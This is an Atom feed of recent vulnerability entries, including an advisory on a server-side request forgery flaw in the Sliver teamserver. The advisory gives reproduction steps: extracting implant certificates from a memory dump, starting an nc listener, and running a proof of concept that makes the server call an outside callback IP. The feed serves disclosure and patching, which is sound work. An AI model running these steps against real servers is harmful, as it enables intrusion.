<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-03T23:15:06.977487+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-218434</id>
    <title>EUVD-2026-218434</title>
    <updated>2026-10-03T23:15:07.027823+00:00</updated>
    <content>EUVD-2026-218434</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-218434"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2025-27090</id>
    <title>fkie_cve-2025-27090</title>
    <updated>2026-10-03T23:15:07.027863+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing. The reverse port forwarding in sliver teamserver allows the implant to open a reverse tunnel on the sliver teamserver without verifying if the operator instructed the implant to do so. The only impact that has been shown is the exposure of the server's IP address to a third party. This issue has been addressed in version 1.5.43 and all users are advised to upgrade. There are no known workarounds for this vulnerability.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2025-27090"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-fh4v-v779-4g2w</id>
    <title>GHSA-fh4v-v779-4g2w — SSRF in sliver teamserver</title>
    <updated>2026-10-03T23:15:07.027902+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Go: github.com/bishopfox/sliver</p>
<p>### Summary
The reverse port forwarding in sliver teamserver allows the implant to open a reverse tunnel on the sliver teamserver without verifying if the operator instructed the implant to do so</p>
<p>### Reproduction steps
Run server
```
wget https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-server_linux
chmod +x sliver-server_linux
./sliver-server_linux
```</p>
<p>Generate binary
```
generate --mtls 127.0.0.1:8443
```</p>
<p>Run it on windows, then `Task manager -&gt; find process -&gt; Create memory dump file`</p>
<p>Install RogueSliver and get the certs
```
git clone https://github.com/ACE-Responder/RogueSliver.git
pip3 install -r requirements.txt --break-system-packages
python3 ExtractCerts.py implant.dmp
```</p>
<p>Start callback listener. Teamserver will connect when POC is run and send "ssrf poc" to nc
```
nc -nvlp 1111
```</p>
<p>Run the poc (pasted at bottom of this file)
```
python3 poc.py &lt;SLIVER IP&gt; &lt;MTLS PORT&gt; &lt;CALLBACK IP&gt; &lt;CALLBACK PORT&gt;
python3 poc.py 192.168.1.33 8443 44.221.186.72 1111
```</p>
<p>### Details
We see here an envelope is read from the connection and if the envelope.Type matches a handler the handler will be executed
```go
func handleSliverConnection(conn net.Conn) {
	mtlsLog.Infof("Accepted incoming connection: %s", conn.RemoteAddr())
	implantConn := core.NewImplantConnection(consts.MtlsStr, conn.RemoteAddr().String())</p>
<p>defer func() {
		mtlsLog.Debugf("mtls connection closing")
		conn.Close()
		implantConn.Cleanup()
	}()</p>
<p>done := make(chan bool)
	go func() {
		def…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-fh4v-v779-4g2w"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/opensuse-su-2025:14889-1</id>
    <title>openSUSE-SU-2025:14889-1 — govulncheck-vulndb-0.0.20250312T181707-1.1 on GA media</title>
    <updated>2026-10-03T23:15:07.027989+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>govulncheck-vulndb-0.0.20250312T181707-1.1 on GA media</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/opensuse-su-2025:14889-1"/>
  </entry>
</feed>
